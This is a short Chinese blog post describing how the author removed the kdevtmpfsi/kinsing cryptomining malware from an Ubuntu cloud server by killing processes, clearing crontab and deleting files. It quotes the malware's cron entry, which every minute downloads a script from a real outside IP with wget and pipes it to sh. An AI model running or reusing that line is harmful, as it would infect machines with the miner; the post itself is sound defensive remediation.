阿里云Ubuntu下处理 kdevtmpfsi进程——挖矿病毒_服务器病毒处理

今天做大数据实验,忽然发现CPU使用率,MEMORY使用率突然变得极其不正常,CPU使用率竟然达到了100%。因为解决问题时忘记截图,下面有些图是从网上找的,我会在下面贴出链接。

1、使用top ,找到相关进程

top


2.查找进程相关信息(进程目录,相关联的其它进程),这里的14538是top后查看到的PID,如上图所示。

systemctl status 14538


kinsing 是kdevtmpfsi背后的守护进程,需要先杀kinsing然后再杀kdevtmpfsi。

3.杀死进程

kill -9 14538
kill -9 20752

4.清理定时任务

查看定时任务

crontab -l

查看到结果:* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

清理定时任务

crontab -e

我这里选择的是第二个选项,使用vim,然后把打开的文件中的内容全部删除。

Esc ----> : -----> wq! 保存退出。

6.删除文件

sudo rm -rf /tmp/kdevtmpfsi

sudo rm -rf /tmp/kinsing

sudo rm -rf /var/tmp/kinsing

尖叫提醒:

可以按照下面两条指令,查找这两个病毒文件,这样找的比较彻底,然后去对应目录删除

find / -name kdevtmpfsi
find / -name kinsing

参考链接:

https://blog.csdn.net/Baiychenvip/article/details/103778111

https://www.cnblogs.com/lfri/p/13384439.html

posted @ 2021-07-15 21:50  wanpi  阅读(388)  评论(0编辑  收藏  举报